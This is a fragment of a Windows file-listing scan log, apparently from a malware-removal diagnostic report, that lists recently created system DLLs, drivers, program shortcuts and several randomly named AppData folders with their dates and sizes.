2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Rvurcez
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Yhwopc
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Wqy He
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bizpiwcinu
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bgew
2017-07-25 13:53 - 2017-07-25 13:53 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys
2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\****\AppData\LocalLow\Thunder Lotus Games
2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk
2017-07-14 19:07 - 2017-07-14 19:07 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-07-12 19:41 - 2017-07-12 19:41 - 000002487 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-07-12 19:41 - 2017-06-30 16:47 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-07-12 19:41 - 2017-06-30 16:47 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-07-11 21:53 - 2017-08-01 12:32 - 000000000 ____D C:\Users\Public\Speedup Sessions
2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-07-11 20:54 - 2017-07-07 09:23 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2017-07-11 20:54 - 2017-07-07 09:13 - 000554392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2017-07-11 20:54 - 2017-07-07 08:40 - 023677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 000096128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-07-11 20:54 - 2017-07-07 08:29 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 006759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001195240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 008331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-07-11 20:54 - 2017-07-07 08:15 - 008238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 002956800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000790016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:13 - 013839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 004730880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 020504576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 019335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 011870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 005719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 005961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:01 - 006287360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 003656704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-07-11 20:54 - 2017-06-20 08:06 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-07-11 20:54 - 2017-06-20 08:03 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 006554928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:57 - 002681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000406032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe
2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000847872 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 005806048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 07:03 - 000864240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 004536320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 000176032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 002938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
